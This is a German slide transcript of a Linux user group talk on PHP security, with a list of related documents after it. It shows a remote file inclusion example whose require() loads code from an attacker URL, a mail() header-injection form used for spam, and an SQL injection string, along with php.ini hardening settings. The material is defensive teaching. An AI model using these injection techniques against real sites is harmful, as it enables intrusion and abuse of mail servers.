PHP-Security. Aleksander Paravac. Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 1 / 27

Größe: px
Ab Seite anzeigen:

Download "PHP-Security. Aleksander Paravac. watz@lug-bamberg.de http://www.lug-bamberg.de. Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 1 / 27"

Transkript

1 PHP-Security Aleksander Paravac Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 1 / 27

2 Übersicht 1 Motivation 2 Einsatz von PHP auf dem Webserver Als Webserver Modul Als CGI Modul 3 Codebeispiele Includes Mail 4 PHP absichern Code-Reviews Konfiguration härten Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 2 / 27

3 Motivation Warum PHP-Security? Motivation Warum einen Vortrag über PHP-Security? Gründe große Verbreitung von LAMP auf Webhostingssystemen zahlreiche CMS auf PHP-Basis (z.b. Joomla, Drupal, Wordpress, Typo3,...) Vorteil der Sprache: PHP ist einfach Nachteil der Sprache: PHP ist einfach Angriffe auf GNU/Linux Server meist durch Fehler in den CMS Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 3 / 27

4 Motivation Warum PHP-Security? Motivation Warum einen Vortrag über PHP-Security? Gründe große Verbreitung von LAMP auf Webhostingssystemen zahlreiche CMS auf PHP-Basis (z.b. Joomla, Drupal, Wordpress, Typo3,...) Vorteil der Sprache: PHP ist einfach Nachteil der Sprache: PHP ist einfach Angriffe auf GNU/Linux Server meist durch Fehler in den CMS Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 3 / 27

5 Motivation Warum PHP-Security? Motivation Warum einen Vortrag über PHP-Security? Gründe große Verbreitung von LAMP auf Webhostingssystemen zahlreiche CMS auf PHP-Basis (z.b. Joomla, Drupal, Wordpress, Typo3,...) Vorteil der Sprache: PHP ist einfach Nachteil der Sprache: PHP ist einfach Angriffe auf GNU/Linux Server meist durch Fehler in den CMS Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 3 / 27

6 Motivation Warum PHP-Security? Motivation Warum einen Vortrag über PHP-Security? Gründe große Verbreitung von LAMP auf Webhostingssystemen zahlreiche CMS auf PHP-Basis (z.b. Joomla, Drupal, Wordpress, Typo3,...) Vorteil der Sprache: PHP ist einfach Nachteil der Sprache: PHP ist einfach Angriffe auf GNU/Linux Server meist durch Fehler in den CMS Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 3 / 27

7 Motivation Warum PHP-Security? Motivation Warum einen Vortrag über PHP-Security? Gründe große Verbreitung von LAMP auf Webhostingssystemen zahlreiche CMS auf PHP-Basis (z.b. Joomla, Drupal, Wordpress, Typo3,...) Vorteil der Sprache: PHP ist einfach Nachteil der Sprache: PHP ist einfach Angriffe auf GNU/Linux Server meist durch Fehler in den CMS Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 3 / 27

8 Einsatz von PHP auf dem Webserver Übersicht PHP auf dem Webserver, aber wie? Es gibt zwei Möglichkeiten PHP auf dem Webserver zu betreiben: Einsatzmöglichkeiten Als Server-Modul Als CGI-Modul Meist kommt als Webserver der Apache zum Einsatz. Allerdings gibt es PHP auch für den MSIIS oder dem Lighttpd. Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 4 / 27

9 Einsatz von PHP auf dem Webserver Übersicht PHP auf dem Webserver, aber wie? Es gibt zwei Möglichkeiten PHP auf dem Webserver zu betreiben: Einsatzmöglichkeiten Als Server-Modul Als CGI-Modul Meist kommt als Webserver der Apache zum Einsatz. Allerdings gibt es PHP auch für den MSIIS oder dem Lighttpd. Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 4 / 27

10 Einsatz von PHP auf dem Webserver Als Webserver Modul Übersicht 1 Motivation 2 Einsatz von PHP auf dem Webserver Als Webserver Modul Als CGI Modul 3 Codebeispiele Includes Mail 4 PHP absichern Code-Reviews Konfiguration härten Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 5 / 27

11 Einsatz von PHP auf dem Webserver Als Webserver Modul mod_php Diese Methode kommt in der Regel in Verbindung mit dem Apache Webserver am häufigsten vor. Vorteile Läuft meist direkt ohne große Probleme Geringer Konfigurationsaufwand Zentrale php.ini Bei VirtualHosts maßgeschneiderte Einstellungen über php_admin_value in der httpd.conf php_flag per.htaccess Aber: Möglichkeiten finden kaum Einsatz Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 6 / 27

12 Einsatz von PHP auf dem Webserver Als Webserver Modul mod_php Diese Methode kommt in der Regel in Verbindung mit dem Apache Webserver am häufigsten vor. Nachteile Jede PHP-Anwendung läuft als Webserver-User In VirtualHosts-Umgebung Gefährdung anderer Benutzer Eine zentrale php.ini für alle Rechtemanagement (Webserver muss evtl. auch schreiben dürfen!) Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 6 / 27

13 Einsatz von PHP auf dem Webserver Als CGI Modul Übersicht 1 Motivation 2 Einsatz von PHP auf dem Webserver Als Webserver Modul Als CGI Modul 3 Codebeispiele Includes Mail 4 PHP absichern Code-Reviews Konfiguration härten Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 7 / 27

14 Einsatz von PHP auf dem Webserver Als CGI Modul mod_php_cgi In letzter Zeit kommt PHP auch als CGI des öfteren zum Einsatz: Vorteile Einsatz von mod_suexec bzw. mod_suphp PHP-Skript wird als Benutzer des Skripts ausgeführt Individuelle Einstellungen pro User über userspezifische php.ini möglich Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 8 / 27

15 Einsatz von PHP auf dem Webserver Als CGI Modul mod_php_cgi In letzter Zeit kommt PHP auch als CGI des öfteren zum Einsatz: Nachteile Hoher administrativer Aufwand Großer Verwaltungsoverhead Nicht jede Software läuft einwandfrei als CGI (z.b. Gallery) Wartung aufwendiger (z.b. beim Update der PHP-Version) Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 8 / 27

16 Codebeispiele Includes Übersicht 1 Motivation 2 Einsatz von PHP auf dem Webserver Als Webserver Modul Als CGI Modul 3 Codebeispiele Includes Mail 4 PHP absichern Code-Reviews Konfiguration härten Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 9 / 27

17 Codebeispiele Includes Das include()-problem Häufig werden include()- und require()-anweisungen nicht richtig behandelt. Probleme In include()- bzw. require()-anweisungen werden gern Variablen verwendet. z.b. include($pfad."/config.inc.php"); Dabei wird $pfad nicht aussreichend überprüft Variablen können eventuell überschrieben werden Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 10 / 27

18 Codebeispiele Includes Das include()-problem Beispiel aus einem Joomla Modul //Workaround for register_globals TODO: fix if (!defined('path_to_lmo')) { define('path_to_lmo', $mosconfig_absolute_path. "/administrator/components/com_lmo/"); } [...] require(path_to_lmo."/init.php"); Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 11 / 27

19 Codebeispiele Includes Das include()-problem Was macht import_request_variables()? Was passiert? Es importiert Variablen aus dem Request-Pool als globale Variablen g für GET-Requests p für POST-Requests c für COOKIE-Requests Beispiel für einen GET-Request: Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 12 / 27

20 Codebeispiele Includes Das include()-problem Was macht import_request_variables()? und dann? Aus der URL wird per GET-Request die Variable theme auf schwarz gesetzt. Anschließend ist in PHP die Variable $theme als globale Variable verfügbar mit dem Wert schwarz Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 12 / 27

21 Codebeispiele Includes Das include()-problem Was passiert nun bei einem Aufruf von: Böser Aufruf mosconfig_absolute_path= Bösen Code einbinden In der require()-anweisung steht nun: require('http://www.boese-seite.de/boeser_ordner/ administrator/components/com_lmo/init.php'); Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 13 / 27

22 Codebeispiele Mail Übersicht 1 Motivation 2 Einsatz von PHP auf dem Webserver Als Webserver Modul Als CGI Modul 3 Codebeispiele Includes Mail 4 PHP absichern Code-Reviews Konfiguration härten Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 14 / 27

23 Codebeispiele Mail Das mail()-problem Die PHP mail()-funktion bietet Spamern eine nette Angriffsfläche: Syntax von mail() mail ($to, $subject, $message, $header, $additional_parameters); $header und $additional_parameters sind nicht zwingend notwendig. Aber: PHP erlaubt das modifizieren des -headers über die $header-variable. Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 15 / 27

24 Codebeispiele Mail Das mail()-problem Für leckeren Spamversand nehme man: Zutaten 1 Ein kleines Mail-Formular 2 PHP-Code mit mail()-befehl 3 Fehlerhafte Überprüfung der Eingaben 4 Bei 200 Request/sec spamen! Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 16 / 27

25 Codebeispiele Mail Das mail()-problem Das Formular kontakt.html [..] <form action="mail.php" method="post"> <input type="text" name="vorname" size="20"> <input type="text" name="nachname" size="20"> <input type="text" name=" " size="40"> <textarea name="inhalt" rows="5" cols="20"></textarea> <input type="submit" value="absenden"> </form> [..] Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 17 / 27

26 Codebeispiele Mail Das mail()-problem Das PHP-Skript mail.php <?php $empfaenger = $betreff = "Anfrage über das Webformular"; $sender = $_POST["vorname"]." ".$_POST["nachname"]; $header = "From: ".$sender." <".$_POST[" "].">"; mail ($empfaenger, $betreff, $_POST["inhalt"], $header);?> Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 18 / 27

27 Codebeispiele Mail Das mail()-problem Das -Eingabefeld wird nicht richtig überprüft. Dies erlaubt einen Angreifer vollen Zugriff auf die $header Variable und hat somit Zugriff auf weitere Felder: Extended Access Überschreibung des Feldes: From: Weitere Definitionen, wie CC: und BCC: Überschreibung des Feldes: Subject: Definition eines ganzen neuen -texts Grund: Der $header wird in der zwischen dem Header des Mail-Servers und dem orginalen Body der eingefügt Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 19 / 27

28 PHP absichern Code-Reviews Übersicht 1 Motivation 2 Einsatz von PHP auf dem Webserver Als Webserver Modul Als CGI Modul 3 Codebeispiele Includes Mail 4 PHP absichern Code-Reviews Konfiguration härten Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 20 / 27

29 PHP absichern Code-Reviews Debugging ist nicht schwer Im Falle des mail()-befehles hätte eine Überprüfung der Formulareingabe geholfen. z.b. über eine Perl-Regular-Expression: $mail_check_reg = '/^ [\w.!#%&\*\/=\?\^\`\{\ \}\~+-] [[:alnum:].-]{1,255} \. [a-z]{2,6} $/xi'; $ = trim($_post[" ]); if (!preg_match($mail_check_reg, $ )) { die ("Keine gültige -adresse!\n"); } Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 21 / 27

30 PHP absichern Code-Reviews SQL-Injections Ein weiter grober Fehler bei der Übergabe von Formulardaten sind Unachtsamkeiten z.b. bei Suchanfragen, die direkt an eine SQL-Datenbank weiter gereicht werden. Beispiel Über Suchanfragen wie z.b. ' OR 1; SHOW TABLES; bekommt ein Angreifer Informationen über die dahinter liegende Datenbanken, da die meisten Anfragen wie folgt behandelt werden: $sql_query = "SELECT * FROM `tabelle` WHERE `feld` LIKE '%".$suche."%'"; Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 22 / 27

31 PHP absichern Konfiguration härten Übersicht 1 Motivation 2 Einsatz von PHP auf dem Webserver Als Webserver Modul Als CGI Modul 3 Codebeispiele Includes Mail 4 PHP absichern Code-Reviews Konfiguration härten Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 23 / 27

32 PHP absichern Konfiguration härten Die php.ini Generell wichtige Einstellungen Wichtige Einstellungen register_globals = Off allow_url_fopen = Off disable_functions = exec,system,passthru,shell_exec, popen,escapeshellcmd,proc_open,proc_nice,ini_restore display_errors = off Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 24 / 27

33 PHP absichern Konfiguration härten Die php.ini Safe-Mode und OpenBaseDir Wichtige Einstellungen safe_mode = On safe_mode_gid = On safe_mode_exec_dir =... safe_mode_include_dir =... open_basedir =... Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 25 / 27

34 PHP absichern Konfiguration härten PHP-Sicherheitserweiterung Suhosin Streams verbieten Suhosin-Patch allow_url_fopen = Off verbietet zwar das Öffnen von externen URLs per http oder ftp, aber nicht das Öffnen von Streams, wie z.b. data:// oder php://. Über den Suhosin-Patch lässt sich dies ebenfalls vermeiden. Ihn gibt es zu finden unter: Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 26 / 27

35 PHP absichern Konfiguration härten Vielen Dank für Ihre Aufmerksamkeit Aleksander Paravac (GNU/Linux User Group Bamberg/Forchheim) 27 / 27

PHP sicher, performant und skalierbar betreiben

PHP sicher, performant und skalierbar betreiben PHP sicher, performant und skalierbar betreiben Dipl.-Inform. Dominik Vallendor 26.09.2012 Tralios IT GmbH www.tralios.de Über mich Dominik Vallendor Studium der Informatik in Karlsruhe Seit 1995: Internet

Mehr

PHP-Schwachstellen und deren Ausnutzung

PHP-Schwachstellen und deren Ausnutzung PHP-Schwachstellen und deren Ausnutzung 44. DFN Betriebstagung / 7. Februar 2006 DFN-CERT Services GmbH Jan Kohlrausch / CSIRT Gliederung Grundlagen HTTP und PHP Anatomie typischer Schwachstellen in PHP-Skripten

Mehr

php Hier soll ein Überblick über das Erstellen von php Programmen gegeben werden. Inhaltsverzeichnis 1.Überblick...2 2.Parameterübergabe...

php Hier soll ein Überblick über das Erstellen von php Programmen gegeben werden. Inhaltsverzeichnis 1.Überblick...2 2.Parameterübergabe... php Hier soll ein Überblick über das Erstellen von php Programmen gegeben werden. Inhaltsverzeichnis 1.Überblick...2 2.Parameterübergabe...7 3.Zugriff auf mysql Daten...11 Verteilte Systeme: php.sxw Prof.

Mehr

XSS for fun and profit

XSS for fun and profit 5. Chemnitzer Linux-Tag 1.-2.- März 2003 XSS for fun and profit Theorie und Praxis von Cross Site Scripting (XSS) Sicherheitslücken, Diebstahl von Cookies, Ausführen von Scripten auf fremden Webservern,

Mehr

vii Inhaltsverzeichnis 1 Einleitung 1

vii Inhaltsverzeichnis 1 Einleitung 1 vii 1 Einleitung 1 1.1 Über dieses Buch................................. 1 1.2 Was ist Sicherheit?............................... 4 1.3 Wichtige Begriffe................................ 5 1.4 Sicherheitskonzepte..............................

Mehr

Dem Hack keine Chance LAMP im Shared-Hosting sicher betreiben

Dem Hack keine Chance LAMP im Shared-Hosting sicher betreiben Dem Hack keine Chance LAMP im Shared-Hosting sicher betreiben Heinlein Support GmbH Peer Heinlein Selbstschutz Wo sind meine Risiken? Haben wir Geheimnisse?.htaccess und.htpasswd

Mehr

PHP Einsteiger Tutorial Kapitel 4: Ein Email Kontaktformular in PHP Version 1.0 letzte Änderung: 2005-02-03

PHP Einsteiger Tutorial Kapitel 4: Ein Email Kontaktformular in PHP Version 1.0 letzte Änderung: 2005-02-03 PHP Einsteiger Tutorial Kapitel 4: Ein Email Kontaktformular in PHP Version 1.0 letzte Änderung: 2005-02-03 Bei dem vierten Teil geht es um etwas praktisches: ein Emailformular, dass man auf der eigenen

Mehr

PHP-Sicherheit. PHP/MySQL-Webanwendungen sicher programmieren. Ifl dpunkt.verlag. Christopher Kunz Stefan Esser Peter Prochaska

PHP-Sicherheit. PHP/MySQL-Webanwendungen sicher programmieren. Ifl dpunkt.verlag. Christopher Kunz Stefan Esser Peter Prochaska Christopher Kunz Stefan Esser Peter Prochaska PHP-Sicherheit PHP/MySQL-Webanwendungen sicher programmieren 2., aktualisierte und überarbeitete Auflage Ifl dpunkt.verlag Inhaltsverzeichnis 1 Einleitung

Mehr

Um einen Form-Mailer in Ihre Seite zu integrieren, kopieren Sie bitte den folgenden HTML-Code und fügen ihn in den Quelltext Ihrer Seite ein:

Um einen Form-Mailer in Ihre Seite zu integrieren, kopieren Sie bitte den folgenden HTML-Code und fügen ihn in den Quelltext Ihrer Seite ein: Was ist ein Kontaktformular / Form-Mailer? Über ein Kontaktformular können Besucher Ihrer Webseite, Ihnen direkt über die Webseite eine Nachricht zukommen lassen. Der Besucher füllt einfach die Felder

Mehr

Aktuelle Angriffstechniken. Steffen Tröscher cirosec GmbH, Heilbronn

Aktuelle Angriffstechniken. Steffen Tröscher cirosec GmbH, Heilbronn Aktuelle Angriffstechniken Steffen Tröscher cirosec GmbH, Heilbronn Gliederung Angriffe auf Webanwendungen Theorie und Live Demonstrationen Schwachstellen Command Injection über File Inclusion Logische

Mehr

PHP-Sicherheit. Christopher Kunz kunz@rvs.uni-hannover.de. Regionales Rechenzentrum für Niedersachsen

PHP-Sicherheit. Christopher Kunz kunz@rvs.uni-hannover.de. Regionales Rechenzentrum für Niedersachsen PHP-Sicherheit Christopher Kunz kunz@rvs.uni-hannover.de Vorstellung PHP-Erfahrung seit 1999 Studium (M. Sc. Informatik) in Hannover Mitglied im Hardened-PHP Project URLs http://www.christopher-kunz.de/

Mehr

Installation von Typo3 CMS

Installation von Typo3 CMS Installation von Typo3 CMS TYPO3 Version 6.2.x unter Windows Eigenen lokalen Webserver mit XAMPP installieren Für die Installation von Typo3 wird eine passende Systemumgebung benötig. Diese besteht aus

Mehr

web(in)securities CISCO Academy Day 11/12.05.2012 Mark Hloch Montag, 14. Mai 12

web(in)securities CISCO Academy Day 11/12.05.2012 Mark Hloch Montag, 14. Mai 12 Hochschule Niederrhein University of Applied Sciences Elektrotechnik und Informatik Faculty of Electrical Engineering and Computer Science web(in)securities CISCO Academy Day 11/12.05.2012 Mark Hloch Inhalt

Mehr

PHP Sicherheit. GNU Linux User Group Bamberg/Forchheim 04.11.2004. Alexander Meindl / meindlsoft am@meindlsoft.com

PHP Sicherheit. GNU Linux User Group Bamberg/Forchheim 04.11.2004. Alexander Meindl / meindlsoft am@meindlsoft.com PHP Sicherheit GNU Linux User Group Bamberg/Forchheim 04.11.2004 Alexander Meindl / meindlsoft am@meindlsoft.com PHP Sicherheit: Agenda Installation Konfiguration php.ini Webserver (Apache) Anpassungen

Mehr

Einleitung Performance Konfiguration Quellen. NginX-Webserver. UnFUG. Christian Fischer. 28. April 2011

Einleitung Performance Konfiguration Quellen. NginX-Webserver. UnFUG. Christian Fischer. 28. April 2011 UnFUG 28. April 2011 Inhalt 1 Übersicht Statistiken Vor- und Nachteile 2.htaccess Architektur Eigene Erfahrung 3 4 Übersicht Übersicht Statistiken Vor- und Nachteile Ursprünglich von Igor Sysoev für rambler.ru

Mehr

vii Inhaltsverzeichnis 1 Einleitung 1

vii Inhaltsverzeichnis 1 Einleitung 1 vii 1 Einleitung 1 1.1 Über dieses Buch................................. 1 1.2 Was ist Sicherheit?............................... 3 1.3 Wichtige Begriffe................................ 4 1.4 Sicherheitskonzepte..............................

Mehr

Programmieren 2 (Prof. Hasbargen) Klausur

Programmieren 2 (Prof. Hasbargen) Klausur Programmieren 2 (Prof. Hasbargen) 1 Klausur Aufgabe 1 (10 Punkte) Dynamisierung von HTML-Seiten HTML-Seiten sind eine gängige Art und Weise, Informationen darzustellen. Nennen Sie die Gründe, welche Vorteile

Mehr

Typo3 - Schutz und Sicherheit - 07.11.07

Typo3 - Schutz und Sicherheit - 07.11.07 Typo3 - Schutz und Sicherheit - 07.11.07 1 Angriffe auf Web-Anwendungen wie CMS oder Shop- Systeme durch zum Beispiel SQL Injection haben sich in den letzten Monaten zu einem Kernthema im Bereich IT- Sicherheit

Mehr

Formular / Counter. Handbuch

Formular / Counter. Handbuch Handbuch November 2012, Copyright Webland AG 2012 Inhalt Formular Allg. Informationen Formular konfigurieren 1. Schritt: Erstellen des Formulars 2. Schritt: Konfiguration des Formulars 3. Schritt: Integration

Mehr

Sicherheit in Webanwendungen CrossSite, Session und SQL

Sicherheit in Webanwendungen CrossSite, Session und SQL Sicherheit in Webanwendungen CrossSite, Session und SQL Angriffstechniken und Abwehrmaßnahmen Mario Klump Die Cross-Site -Familie Die Cross-Site-Arten Cross-Site-Scripting (CSS/XSS) Cross-Site-Request-Forgery

Mehr

Der XAMPP-Stack. Apache, PHP und MySQL im Überblick

Der XAMPP-Stack. Apache, PHP und MySQL im Überblick Der XAMPP-Stack Apache, PHP und MySQL im Überblick LAMP und XAMPP LAMP: Linux + Apache + MySQL + PHP sehr populäre Kombination zur Bereitstellung dynamischer Web-Inhalte mit Apache: Webserver MySQL: Datenbankmanagementsystem

Mehr

Open Catalog Interface (OCI) Anbindung an VirtueMart

Open Catalog Interface (OCI) Anbindung an VirtueMart Ver. 2.5.1 Open Catalog Interface (OCI) Anbindung an VirtueMart Joomla 2.5 und Virtuemart 2.0.6 Ing. Karl Hirzberger www.hirzberger.at Inhaltsverzeichnis Begriffserklärung... 3 OCI für VirtueMart... 4

Mehr

UNIX-Stammtisch, TU Chemnitz. UNIX-Stammtisch: Chemnitz, 27.05.2008. Content Management mit TYPO3. Sebastian Meyer. E-Mail: smeyer@slub-dresden.

UNIX-Stammtisch, TU Chemnitz. UNIX-Stammtisch: Chemnitz, 27.05.2008. Content Management mit TYPO3. Sebastian Meyer. E-Mail: smeyer@slub-dresden. UNIX-Stammtisch: Content Management mit TYPO3 Themen: Was ist ein CMS? (Definition, Konzepte, Vor- und Nachteile) Warum gerade TYPO3? (Einführung in TYPO3 und Vergleich mit anderen CMS) TYPO3 aus Sicht......eines

Mehr

11 Pull-Down-Menu und Datenbank

11 Pull-Down-Menu und Datenbank 11 Pull-Down-Menu und Datenbank Die Übergabe von Variablen in PHP (von einer Datei zur nächsten) kann auf zwei Arten erfolgen: Sie wird entweder in einem Formular übertragen (alle Variablen der Formularfelder,

Mehr

Informationstechnik & System-Management SQL INJECTION. Selbstgemachte Sicherheitslücken. SQL-Injection ITSB2006 Michael Donabaum

Informationstechnik & System-Management SQL INJECTION. Selbstgemachte Sicherheitslücken. SQL-Injection ITSB2006 Michael Donabaum SQL INJECTION Selbstgemachte Sicherheitslücken Beschreibung SQL-Injection SQL-Einschleusung Ausnutzen von Sicherheitslücken in Zusammenspiel mit SQL-Datenbanken Mangelnde Maskierung von Metazeichen \ ;

Mehr

E-Commerce: IT-Werkzeuge. Web-Programmierung. Kapitel 4: Einführung in JavaScript Stand: 03.11.2014. Übung WS 2014/2015. Benedikt Schumm M.Sc.

E-Commerce: IT-Werkzeuge. Web-Programmierung. Kapitel 4: Einführung in JavaScript Stand: 03.11.2014. Übung WS 2014/2015. Benedikt Schumm M.Sc. Übung WS 2014/2015 E-Commerce: IT-Werkzeuge Web-Programmierung Kapitel 4: Stand: 03.11.2014 Benedikt Schumm M.Sc. Lehrstuhl für ABWL und Wirtschaftsinformatik Katholische Universität Eichstätt-Ingolstadt

Mehr

Internetanbindung von Datenbanken

Internetanbindung von Datenbanken Internetanbindung von Datenbanken http://galahad.informatik.fh-kl.de/~miesel/index.html PHP -1 Gliederung Einführung PHP3 Datenbankanbindung mit PHP3 Sicherheitsprobleme Realisierung mit PHP3 Probleme

Mehr

Ist meine WebSite noch sicher?

Ist meine WebSite noch sicher? Ist meine WebSite noch sicher? Massive Angriffe gegen Joomla, Wordpress, Typo3 02.12.2014 Stephan Sachweh Geschäftsführer Pallas GmbH Pallas stellt sich vor Wir sind ein MSSP: Managed Security Service

Mehr

PHP 6 Beliebte Webskriptsprache wird erwachsen. Linux User Group Bern 14.05.2009 René Moser

PHP 6 Beliebte Webskriptsprache wird erwachsen. Linux User Group Bern 14.05.2009 René Moser <mail@renemoser.net> PHP 6 Beliebte Webskriptsprache wird erwachsen Linux User Group Bern 14.05.2009 René Moser Inhalt 1.Wie entstand PHP? 2.Was PHP? 3.Warum PHP? 4.Wie installiere ich PHP? 5.Wie programmiere

Mehr

Konzept eines Datenbankprototypen. 30.06.2003 Folie 1 Daniel Gander / Gerhard Schrotter

Konzept eines Datenbankprototypen. 30.06.2003 Folie 1 Daniel Gander / Gerhard Schrotter Konzept eines Datenbankprototypen 30.06.2003 Folie 1 Daniel Gander / Gerhard Schrotter Inhalt (1) Projektvorstellung & Projektzeitplan Softwarekomponenten Detailierte Beschreibung der System Bausteine

Mehr

FAQ - Script gaesteform

FAQ - Script gaesteform FAQ - Script gaesteform www.kundencenter.ws 9. April 2009 Salvatore Spadaro 1 2 Inhaltsverzeichnis 1 Script - gaesteform 3 1.1 Welchen Funktionumfang bietet das Script gaesteform und welche Technik steckt

Mehr

2. Interaktive Web Seiten. action in Formularen. Formular. Superglobale Variablen $ POST, $ GET und $ REQUEST. GET und POST

2. Interaktive Web Seiten. action in Formularen. Formular. Superglobale Variablen $ POST, $ GET und $ REQUEST. GET und POST 2. Interaktive Web Seiten GET und POST Die Übertragungsmethoden GET und POST sind im http Protokoll definiert: POST: gibt an, dass sich weitere Daten im Körper der übertragenen Nachricht befinden: z.b.

Mehr

Sichere Ablage von Zugangsdaten (nicht nur) zu Datenbanken in PHP-Projekten

Sichere Ablage von Zugangsdaten (nicht nur) zu Datenbanken in PHP-Projekten Jörg Reinholz, fastix WebDesign & Consult, Kassel Seite 1 von 5 Sichere Ablage von Zugangsdaten (nicht nur) zu Datenbanken in PHP-Projekten Eine immer wieder gestellte Frage im Zusammenhang mit PHP-Projekten

Mehr

Aktuelle Sicherheitsprobleme im Internet

Aktuelle Sicherheitsprobleme im Internet Herbst 2014 Aktuelle Sicherheitsprobleme im Internet Wirtschaftsinformatik: 5. Semester Dozenten: Rainer Telesko / Martin Hüsler Fachhochschule Nordwestschweiz FHNW / Rainer Telesko - Martin Hüsler 1 Inhalt

Mehr

Datenbank - Teil 3. Ziele: Eine Datenbank anlegen mit SQL. Daten eingeben mit SQL. Abfragen stellen mit SQL und PHP.

Datenbank - Teil 3. Ziele: Eine Datenbank anlegen mit SQL. Daten eingeben mit SQL. Abfragen stellen mit SQL und PHP. Ziele: Eine Datenbank anlegen mit SQL Daten eingeben mit SQL Abfragen stellen mit SQL und PHP 1 Datenbankserver Entwickelt von der schwedischen Aktiengesellschaft MySQL Unter GNU General Public License

Mehr

Schwerpunkt Konfiguration.htaccess Version 2.2.x

Schwerpunkt Konfiguration.htaccess Version 2.2.x Apache Webserver Schwerpunkt Konfiguration.htaccess Version 2.2.x Mario Herold LINUX USER GROUP PEINE WWW.LUG- PEINE.ORG This work is licen sed u nd er the Creative Com m on s Attrib ution- - Sh arealike

Mehr

Das Paket enthält: vionlink-formmailer.php formular.htm meldung_template.htm danke_template.htm src/font.tff src/bg.png src/capmaker.

Das Paket enthält: vionlink-formmailer.php formular.htm meldung_template.htm danke_template.htm src/font.tff src/bg.png src/capmaker. Das Paket enthält: vionlink-formmailer.php formular.htm meldung_template.htm danke_template.htm src/font.tff src/bg.png src/capmaker.php eine Nutzungslizenz Lizenz- und Nutzungsbestimmungen.pdf dieses

Mehr

Scripting Server (Lamp) Domain Hosting

Scripting Server (Lamp) Domain Hosting Scripting Server (Lamp) Domain Hosting Quick-Start Guide 08.12.09 - HS - 1/14 Inhalt 1 Einführung...3 1.1 Administration der Internetseiten...3 1.2 Administrationsoberfläche...4 2 Grundkonfiguration...

Mehr

Begleitskript. zum PHP/MySQL. Kurs

Begleitskript. zum PHP/MySQL. Kurs Begleitskript zum PHP/MySQL Kurs http://www.online-platform.net Dieser Text unterliegt der GNU General Public License. Er darf als ganzes oder in Auszügen kopiert werden, vorausgesetzt, dass sich dieser

Mehr

SSO-Schnittstelle. Inhalt: Beschreibung der Single Sign-On (SSO) Schnittstelle. NetSlave GmbH Simon-Dach-Straße 12 D-10245 Berlin

SSO-Schnittstelle. Inhalt: Beschreibung der Single Sign-On (SSO) Schnittstelle. NetSlave GmbH Simon-Dach-Straße 12 D-10245 Berlin SSO-Schnittstelle Inhalt: Beschreibung der Single Sign-On (SSO) Schnittstelle NetSlave GmbH Simon-Dach-Straße 12 D-10245 Berlin Telefon +49 (0)30-94408-730 Telefax +49 (0)30-96083-706 E-Mail mail@netslave.de

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen FAEL-Seminar Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte

Mehr

Apache HTTP-Server Teil 2

Apache HTTP-Server Teil 2 Apache HTTP-Server Teil 2 Zinching Dang 04. Juli 2014 1 Benutzer-Authentifizierung Benutzer-Authentifizierung ermöglicht es, den Zugriff auf die Webseite zu schützen Authentifizierung mit Benutzer und

Mehr

Web-Programmierung (WPR)

Web-Programmierung (WPR) Web-Programmierung (WPR) Vorlesung VIII. Common Gateway Interface(CGI) & PHP mailto:wpr@gruner.org 1 12 Common Gateway Interface Von allen Webservern unterstützt Anzubindende Programme => Gateway zu bestehenden

Mehr

Soziale Funktionen zu verträglichen Kosten

Soziale Funktionen zu verträglichen Kosten Soziale Funktionen zu verträglichen Kosten Marc Achtelig, Dipl.-Ing.(FH), Dipl.-Wirtschaftsing.(FH) Handbücher Online-Hilfen Screencasts www.indoition.com Agenda Integrationsstufen Organisatorische Voraussetzungen

Mehr

Hackerpraktikum Versuch 4

Hackerpraktikum Versuch 4 Hackerpraktikum Versuch 4 Praktikum zur Vorlesung Reaktive Sicherheit WS 09/10 Johannes Hoffmann (hoffmann[-@-]ls6.cs.tu-dortmund.de) Dieser Versuch beschäftigt sich mit serverseitigen Schwachstellen im

Mehr

Version 1.0. Contrexx-Installation unter Windows 2003 und IIS 6. Das Content Management System für Ihren Erfolg.

Version 1.0. Contrexx-Installation unter Windows 2003 und IIS 6. Das Content Management System für Ihren Erfolg. Version 1.0 Contrexx-Installation unter Windows 2003 und IIS 6 Das Content Management System für Ihren Erfolg. Inhaltsverzeichnis 1. INSTALLATION VON MYSQL UND PHP UNTER WINDOWS 2003... 3 1.1 INSTALLATION

Mehr

Dynamische Webanwendungen

